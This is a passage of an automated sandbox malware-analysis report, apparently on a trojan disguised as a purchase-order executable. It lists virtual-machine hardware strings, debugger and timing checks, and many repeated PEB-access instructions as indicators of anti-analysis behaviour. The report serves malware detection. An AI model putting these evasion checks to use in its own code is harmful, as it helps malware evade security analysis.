          Source: explorer.exe, 00000003.00000003.3106694802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106694802.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.1778932144.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000003.00000003.3105954537.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000003.00000002.4205263582.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000003.00000000.1773041835.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000000.1773041835.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0040ACF0 LdrLoadDll,2_2_0040ACF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_0070AA82 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_0070AA82
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172C156 mov eax, dword ptr fs:[00000030h]2_2_0172C156
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C8158 mov eax, dword ptr fs:[00000030h]2_2_017C8158
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01736154 mov eax, dword ptr fs:[00000030h]2_2_01736154
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01736154 mov eax, dword ptr fs:[00000030h]2_2_01736154
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C4144 mov eax, dword ptr fs:[00000030h]2_2_017C4144
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C4144 mov eax, dword ptr fs:[00000030h]2_2_017C4144
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C4144 mov ecx, dword ptr fs:[00000030h]2_2_017C4144
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C4144 mov eax, dword ptr fs:[00000030h]2_2_017C4144
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C4144 mov eax, dword ptr fs:[00000030h]2_2_017C4144
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01760124 mov eax, dword ptr fs:[00000030h]2_2_01760124
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DA118 mov ecx, dword ptr fs:[00000030h]2_2_017DA118
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DA118 mov eax, dword ptr fs:[00000030h]2_2_017DA118
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DA118 mov eax, dword ptr fs:[00000030h]2_2_017DA118
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DA118 mov eax, dword ptr fs:[00000030h]2_2_017DA118
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_018061E5 mov eax, dword ptr fs:[00000030h]2_2_018061E5
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F0115 mov eax, dword ptr fs:[00000030h]2_2_017F0115
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE10E mov eax, dword ptr fs:[00000030h]2_2_017DE10E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE10E mov ecx, dword ptr fs:[00000030h]2_2_017DE10E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE10E mov eax, dword ptr fs:[00000030h]2_2_017DE10E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE10E mov eax, dword ptr fs:[00000030h]2_2_017DE10E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE10E mov ecx, dword ptr fs:[00000030h]2_2_017DE10E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE10E mov eax, dword ptr fs:[00000030h]2_2_017DE10E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE10E mov eax, dword ptr fs:[00000030h]2_2_017DE10E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE10E mov ecx, dword ptr fs:[00000030h]2_2_017DE10E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE10E mov eax, dword ptr fs:[00000030h]2_2_017DE10E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE10E mov ecx, dword ptr fs:[00000030h]2_2_017DE10E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017601F8 mov eax, dword ptr fs:[00000030h]2_2_017601F8
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AE1D0 mov eax, dword ptr fs:[00000030h]2_2_017AE1D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AE1D0 mov eax, dword ptr fs:[00000030h]2_2_017AE1D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_017AE1D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AE1D0 mov eax, dword ptr fs:[00000030h]2_2_017AE1D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AE1D0 mov eax, dword ptr fs:[00000030h]2_2_017AE1D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F61C3 mov eax, dword ptr fs:[00000030h]2_2_017F61C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F61C3 mov eax, dword ptr fs:[00000030h]2_2_017F61C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B019F mov eax, dword ptr fs:[00000030h]2_2_017B019F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B019F mov eax, dword ptr fs:[00000030h]2_2_017B019F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B019F mov eax, dword ptr fs:[00000030h]2_2_017B019F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B019F mov eax, dword ptr fs:[00000030h]2_2_017B019F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804164 mov eax, dword ptr fs:[00000030h]2_2_01804164
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804164 mov eax, dword ptr fs:[00000030h]2_2_01804164
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172A197 mov eax, dword ptr fs:[00000030h]2_2_0172A197
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172A197 mov eax, dword ptr fs:[00000030h]2_2_0172A197
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172A197 mov eax, dword ptr fs:[00000030h]2_2_0172A197
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01770185 mov eax, dword ptr fs:[00000030h]2_2_01770185
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EC188 mov eax, dword ptr fs:[00000030h]2_2_017EC188
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EC188 mov eax, dword ptr fs:[00000030h]2_2_017EC188
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D4180 mov eax, dword ptr fs:[00000030h]2_2_017D4180
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D4180 mov eax, dword ptr fs:[00000030h]2_2_017D4180
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175C073 mov eax, dword ptr fs:[00000030h]2_2_0175C073
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01732050 mov eax, dword ptr fs:[00000030h]2_2_01732050
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B6050 mov eax, dword ptr fs:[00000030h]2_2_017B6050
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C6030 mov eax, dword ptr fs:[00000030h]2_2_017C6030
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172A020 mov eax, dword ptr fs:[00000030h]2_2_0172A020
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172C020 mov eax, dword ptr fs:[00000030h]2_2_0172C020
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174E016 mov eax, dword ptr fs:[00000030h]2_2_0174E016
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174E016 mov eax, dword ptr fs:[00000030h]2_2_0174E016
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174E016 mov eax, dword ptr fs:[00000030h]2_2_0174E016
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174E016 mov eax, dword ptr fs:[00000030h]2_2_0174E016
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B4000 mov ecx, dword ptr fs:[00000030h]2_2_017B4000
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D2000 mov eax, dword ptr fs:[00000030h]2_2_017D2000
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D2000 mov eax, dword ptr fs:[00000030h]2_2_017D2000
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D2000 mov eax, dword ptr fs:[00000030h]2_2_017D2000
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D2000 mov eax, dword ptr fs:[00000030h]2_2_017D2000
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D2000 mov eax, dword ptr fs:[00000030h]2_2_017D2000
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D2000 mov eax, dword ptr fs:[00000030h]2_2_017D2000
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D2000 mov eax, dword ptr fs:[00000030h]2_2_017D2000
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D2000 mov eax, dword ptr fs:[00000030h]2_2_017D2000
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172C0F0 mov eax, dword ptr fs:[00000030h]2_2_0172C0F0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017720F0 mov ecx, dword ptr fs:[00000030h]2_2_017720F0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0172A0E3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017380E9 mov eax, dword ptr fs:[00000030h]2_2_017380E9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B60E0 mov eax, dword ptr fs:[00000030h]2_2_017B60E0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B20DE mov eax, dword ptr fs:[00000030h]2_2_017B20DE
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F60B8 mov eax, dword ptr fs:[00000030h]2_2_017F60B8
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F60B8 mov ecx, dword ptr fs:[00000030h]2_2_017F60B8
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017280A0 mov eax, dword ptr fs:[00000030h]2_2_017280A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C80A8 mov eax, dword ptr fs:[00000030h]2_2_017C80A8
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173208A mov eax, dword ptr fs:[00000030h]2_2_0173208A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D437C mov eax, dword ptr fs:[00000030h]2_2_017D437C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B035C mov eax, dword ptr fs:[00000030h]2_2_017B035C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B035C mov eax, dword ptr fs:[00000030h]2_2_017B035C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B035C mov eax, dword ptr fs:[00000030h]2_2_017B035C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B035C mov ecx, dword ptr fs:[00000030h]2_2_017B035C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B035C mov eax, dword ptr fs:[00000030h]2_2_017B035C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B035C mov eax, dword ptr fs:[00000030h]2_2_017B035C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FA352 mov eax, dword ptr fs:[00000030h]2_2_017FA352
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D8350 mov ecx, dword ptr fs:[00000030h]2_2_017D8350
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B2349 mov eax, dword ptr fs:[00000030h]2_2_017B2349
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172C310 mov ecx, dword ptr fs:[00000030h]2_2_0172C310
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01750310 mov ecx, dword ptr fs:[00000030h]2_2_01750310
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176A30B mov eax, dword ptr fs:[00000030h]2_2_0176A30B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176A30B mov eax, dword ptr fs:[00000030h]2_2_0176A30B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176A30B mov eax, dword ptr fs:[00000030h]2_2_0176A30B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174E3F0 mov eax, dword ptr fs:[00000030h]2_2_0174E3F0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174E3F0 mov eax, dword ptr fs:[00000030h]2_2_0174E3F0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0174E3F0 mov eax, dword ptr fs:[00000030h]2_2_0174E3F0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017663FF mov eax, dword ptr fs:[00000030h]2_2_017663FF
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017403E9 mov eax, dword ptr fs:[00000030h]2_2_017403E9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017403E9 mov eax, dword ptr fs:[00000030h]2_2_017403E9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017403E9 mov eax, dword ptr fs:[00000030h]2_2_017403E9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017403E9 mov eax, dword ptr fs:[00000030h]2_2_017403E9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017403E9 mov eax, dword ptr fs:[00000030h]2_2_017403E9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017403E9 mov eax, dword ptr fs:[00000030h]2_2_017403E9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017403E9 mov eax, dword ptr fs:[00000030h]2_2_017403E9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017403E9 mov eax, dword ptr fs:[00000030h]2_2_017403E9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01808324 mov eax, dword ptr fs:[00000030h]2_2_01808324
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01808324 mov ecx, dword ptr fs:[00000030h]2_2_01808324
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01808324 mov eax, dword ptr fs:[00000030h]2_2_01808324
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01808324 mov eax, dword ptr fs:[00000030h]2_2_01808324
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE3DB mov eax, dword ptr fs:[00000030h]2_2_017DE3DB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE3DB mov eax, dword ptr fs:[00000030h]2_2_017DE3DB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE3DB mov ecx, dword ptr fs:[00000030h]2_2_017DE3DB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE3DB mov eax, dword ptr fs:[00000030h]2_2_017DE3DB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D43D4 mov eax, dword ptr fs:[00000030h]2_2_017D43D4
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D43D4 mov eax, dword ptr fs:[00000030h]2_2_017D43D4
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EC3CD mov eax, dword ptr fs:[00000030h]2_2_017EC3CD
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A3C0 mov eax, dword ptr fs:[00000030h]2_2_0173A3C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A3C0 mov eax, dword ptr fs:[00000030h]2_2_0173A3C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A3C0 mov eax, dword ptr fs:[00000030h]2_2_0173A3C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A3C0 mov eax, dword ptr fs:[00000030h]2_2_0173A3C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A3C0 mov eax, dword ptr fs:[00000030h]2_2_0173A3C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A3C0 mov eax, dword ptr fs:[00000030h]2_2_0173A3C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017383C0 mov eax, dword ptr fs:[00000030h]2_2_017383C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017383C0 mov eax, dword ptr fs:[00000030h]2_2_017383C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017383C0 mov eax, dword ptr fs:[00000030h]2_2_017383C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017383C0 mov eax, dword ptr fs:[00000030h]2_2_017383C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B63C0 mov eax, dword ptr fs:[00000030h]2_2_017B63C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0180634F mov eax, dword ptr fs:[00000030h]2_2_0180634F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01728397 mov eax, dword ptr fs:[00000030h]2_2_01728397
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01728397 mov eax, dword ptr fs:[00000030h]2_2_01728397
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01728397 mov eax, dword ptr fs:[00000030h]2_2_01728397
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172E388 mov eax, dword ptr fs:[00000030h]2_2_0172E388
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172E388 mov eax, dword ptr fs:[00000030h]2_2_0172E388
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172E388 mov eax, dword ptr fs:[00000030h]2_2_0172E388
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175438F mov eax, dword ptr fs:[00000030h]2_2_0175438F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175438F mov eax, dword ptr fs:[00000030h]2_2_0175438F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01734260 mov eax, dword ptr fs:[00000030h]2_2_01734260
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01734260 mov eax, dword ptr fs:[00000030h]2_2_01734260
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01734260 mov eax, dword ptr fs:[00000030h]2_2_01734260
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172826B mov eax, dword ptr fs:[00000030h]2_2_0172826B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172A250 mov eax, dword ptr fs:[00000030h]2_2_0172A250
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01736259 mov eax, dword ptr fs:[00000030h]2_2_01736259
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EA250 mov eax, dword ptr fs:[00000030h]2_2_017EA250
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EA250 mov eax, dword ptr fs:[00000030h]2_2_017EA250
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B8243 mov eax, dword ptr fs:[00000030h]2_2_017B8243
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B8243 mov ecx, dword ptr fs:[00000030h]2_2_017B8243
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172823B mov eax, dword ptr fs:[00000030h]2_2_0172823B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_018062D6 mov eax, dword ptr fs:[00000030h]2_2_018062D6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017402E1 mov eax, dword ptr fs:[00000030h]2_2_017402E1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017402E1 mov eax, dword ptr fs:[00000030h]2_2_017402E1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017402E1 mov eax, dword ptr fs:[00000030h]2_2_017402E1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A2C3 mov eax, dword ptr fs:[00000030h]2_2_0173A2C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A2C3 mov eax, dword ptr fs:[00000030h]2_2_0173A2C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A2C3 mov eax, dword ptr fs:[00000030h]2_2_0173A2C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A2C3 mov eax, dword ptr fs:[00000030h]2_2_0173A2C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A2C3 mov eax, dword ptr fs:[00000030h]2_2_0173A2C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017402A0 mov eax, dword ptr fs:[00000030h]2_2_017402A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017402A0 mov eax, dword ptr fs:[00000030h]2_2_017402A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C62A0 mov eax, dword ptr fs:[00000030h]2_2_017C62A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C62A0 mov ecx, dword ptr fs:[00000030h]2_2_017C62A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C62A0 mov eax, dword ptr fs:[00000030h]2_2_017C62A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C62A0 mov eax, dword ptr fs:[00000030h]2_2_017C62A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C62A0 mov eax, dword ptr fs:[00000030h]2_2_017C62A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C62A0 mov eax, dword ptr fs:[00000030h]2_2_017C62A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0180625D mov eax, dword ptr fs:[00000030h]2_2_0180625D
